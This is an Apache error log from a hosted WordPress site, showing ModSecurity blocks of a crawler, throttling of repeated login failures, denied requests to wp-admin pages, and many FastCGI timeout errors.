[Sun Mar 15 06:00:15.846933 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.228.16:55294] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ1H3bQATo66fKoS7yKKAAAAMI"]
[Sun Mar 15 06:03:01.670673 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.244.31:41216] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ1xXjZBu2q05ozVU-aWQAAAUA"]
[Sun Mar 15 06:05:22.499326 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.228.16:60316] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ2UrABkC4fWIHEf8Ey-QAAAEM"]
[Sun Mar 15 06:08:21.593541 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.244.31:53622] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ3BbABkC4fWIHEf8EzigAAAEo"]
[Sun Mar 15 06:10:45.728352 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.228.16:55010] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ3lXjZBu2q05ozVU-bywAAAUQ"]
[Sun Mar 15 06:14:24.269877 2026] [:error] [pid 21806:tid 140411733534464] [client 94.26.106.205:39920] [client 94.26.106.205] ModSecurity: Access denied with code 403 (phase 2). Operator GT matched 0 at IP:flag_b. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_98_wordpress.conf"] [line "48"] [id "000020"] [msg "WAF Rules : WordPress, 5 auth failures in 60 seconds - blocked for 10 minutes"] [hostname "bandeirantesbombas.com.br"] [uri "/wp-login.php"] [unique_id "abZ4cNSswJuvopo3lOiutQAAAIE"], referer: https://bandeirantesbombas.com.br/wp-login.php
[Sun Mar 15 06:14:28.049556 2026] [:error] [pid 21946:tid 140411741927168] [client 94.26.106.205:39914] [client 94.26.106.205] ModSecurity: Access denied with code 403 (phase 2). Operator GT matched 0 at IP:flag_b. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_98_wordpress.conf"] [line "48"] [id "000020"] [msg "WAF Rules : WordPress, 5 auth failures in 60 seconds - blocked for 10 minutes"] [hostname "bandeirantesbombas.com.br"] [uri "/wp-login.php"] [unique_id "abZ4dHbQATo66fKoS7yNWAAAAMA"], referer: https://bandeirantesbombas.com.br/wp-login.php
[Sun Mar 15 06:14:29.519179 2026] [:error] [pid 21946:tid 140411699963648] [client 94.26.106.205:39914] [client 94.26.106.205] ModSecurity: Access denied with code 403 (phase 2). Operator GT matched 0 at IP:flag_b. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_98_wordpress.conf"] [line "48"] [id "000020"] [msg "WAF Rules : WordPress, 5 auth failures in 60 seconds - blocked for 10 minutes"] [hostname "bandeirantesbombas.com.br"] [uri "/wp-login.php"] [unique_id "abZ4dXbQATo66fKoS7yNYAAAAMU"], referer: https://bandeirantesbombas.com.br/wp-login.php
[Sun Mar 15 06:14:29.763774 2026] [:error] [pid 21946:tid 140411574073088] [client 94.26.106.205:39916] [client 94.26.106.205] ModSecurity: Access denied with code 403 (phase 2). Operator GT matched 0 at IP:flag_b. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_98_wordpress.conf"] [line "48"] [id "000020"] [msg "WAF Rules : WordPress, 5 auth failures in 60 seconds - blocked for 10 minutes"] [hostname "bandeirantesbombas.com.br"] [uri "/wp-login.php"] [unique_id "abZ4dXbQATo66fKoS7yNYwAAANQ"], referer: https://bandeirantesbombas.com.br/wp-login.php
[Sun Mar 15 06:14:31.602461 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.244.31:51154] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ4d9SswJuvopo3lOiuwQAAAJQ"]
[Sun Mar 15 06:15:48.174794 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.228.16:46826] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ4xHbQATo66fKoS7yNrwAAANI"]
[Sun Mar 15 06:19:34.054556 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.244.31:57468] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ5pnjZBu2q05ozVU-dqgAAAUQ"]
[Sun Mar 15 06:21:08.647385 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.228.16:52832] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ6BLABkC4fWIHEf8E2QQAAAEg"]
[Sun Mar 15 06:25:01.967076 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.244.31:48130] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ67bABkC4fWIHEf8E3BQAAAFg"]
[Sun Mar 15 06:26:15.782526 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.228.16:37728] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ7N7ABkC4fWIHEf8E3MAAAAEo"]
[Sun Mar 15 06:30:09.084122 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.244.31:40062] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ8IdSswJuvopo3lOixewAAAJc"]
[Sun Mar 15 06:31:38.703859 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.228.16:40754] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ8erABkC4fWIHEf8E4TAAAAEY"]
[Sun Mar 15 06:35:25.419851 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.244.31:33084] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ9XXjZBu2q05ozVU-gdAAAAU8"]
[Sun Mar 15 06:36:49.908144 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.228.16:57440] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ9sdSswJuvopo3lOiyrAAAAII"]
[Sun Mar 15 06:40:35.703568 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.244.31:45714] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ-k3bQATo66fKoS7yScgAAAMk"]
[Sun Mar 15 06:42:14.381310 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.228.16:51474] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ-9nbQATo66fKoS7yS1AAAAMQ"]
[Sun Mar 15 06:46:01.114754 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.244.31:39020] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ_2XjZBu2q05ozVU-jGQAAAVU"]
[Sun Mar 15 06:57:56.214903 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.228.16:35632] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaCpLABkC4fWIHEf8E-2QAAAE4"]
[Sun Mar 15 07:00:40.813782 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 45.227.253.15:38562] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:01:06.322555 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49630] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:01:28.125806 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:01:49.125804 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:02:12.329781 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50610] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:02:34.129773 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50930] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:02:47.726935 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.244.31:35240] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaDx9SswJuvopo3lOi5pAAAAII"]
[Sun Mar 15 07:02:55.133775 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51282] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:03:11.683174 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.228.16:35808] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaD39SswJuvopo3lOi5vQAAAJE"]
[Sun Mar 15 07:03:16.110191 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:03:37.122061 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51832] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:03:58.377809 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:04:20.117807 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:04:42.362784 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52802] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:05:04.141811 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53174] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:05:25.130879 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53548] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:05:46.128180 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53908] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:06:08.125797 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54286] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:06:29.577935 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54640] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:06:51.058095 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55042] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:07:12.141816 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55364] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:07:33.125851 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55644] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:07:52.261521 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.244.31:49022] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaE-HjZBu2q05ozVU-oSQAAAUs"]
[Sun Mar 15 07:07:55.138059 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56054] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:08:16.137132 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56350] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:08:37.121813 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:56624] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:08:58.126577 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56860] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:09:20.027826 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57110] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:09:30.012160 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.228.16:49618] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaFWtSswJuvopo3lOi6ogAAAIg"]
[Sun Mar 15 07:09:41.129794 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57326] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:10:02.133843 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:10:25.126695 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57764] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:10:46.137810 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:11:07.129809 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58182] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:11:29.129843 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:11:31.492032 2026] [access_compat:error] [pid 11972:tid 140411641214720] [client 161.97.104.217:64093] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/upgrade.php, referer: www.google.com
[Sun Mar 15 07:11:32.851718 2026] [access_compat:error] [pid 11972:tid 140411632822016] [client 161.97.104.217:65348] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/plugin-install.php, referer: www.google.com
[Sun Mar 15 07:11:48.705041 2026] [access_compat:error] [pid 21946:tid 140411607643904] [client 161.97.104.217:49400] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/plugin-install.php, referer: www.google.com
[Sun Mar 15 07:11:50.092462 2026] [access_compat:error] [pid 21806:tid 140411557287680] [client 161.97.104.217:49428] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: www.google.com
[Sun Mar 15 07:11:50.125773 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58656] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:11:51.594121 2026] [access_compat:error] [pid 21806:tid 140411649607424] [client 161.97.104.217:49428] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/plugin-install.php, referer: www.google.com
[Sun Mar 15 07:11:51.801483 2026] [access_compat:error] [pid 21946:tid 140411708356352] [client 161.97.104.217:49400] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-editor.php, referer: www.google.com
[Sun Mar 15 07:12:12.129820 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:12:33.134029 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:12:54.125844 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59616] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:13:09.221944 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.244.31:52532] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaGNbABkC4fWIHEf8FBiQAAAFM"]
[Sun Mar 15 07:13:15.073856 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59930] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:13:37.125781 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60190] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:13:58.128229 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60470] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:14:19.125835 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60736] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:14:40.046911 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.228.16:34550] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaGkHbQATo66fKoS7ya3QAAAMQ"]
[Sun Mar 15 07:14:41.045850 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:32808] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:15:03.129785 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33134] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:15:25.121196 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33390] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:15:47.129829 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33792] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:16:09.137862 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34094] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:16:31.133822 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34414] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:16:52.145769 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34738] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:17:13.917818 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:17:35.137963 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35394] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:17:56.070832 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35772] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:18:17.041824 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36092] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:18:18.913956 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.244.31:44640] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaHanbQATo66fKoS7ybfwAAAMU"]
[Sun Mar 15 07:18:39.021904 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:19:00.142327 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36766] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:19:21.113901 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37116] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:19:42.149787 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37408] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:19:58.598958 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.228.16:54374] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaHzpqj1wV0Si-OkecvzgAAABY"]
[Sun Mar 15 07:20:03.144865 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37690] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:20:24.129879 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38016] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:20:45.137845 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38410] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:21:06.125858 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38778] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:21:28.138001 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39134] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:21:50.137805 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39458] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 07:22:11.113932 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39772] AH01075: Error dispatching request to : (polling)
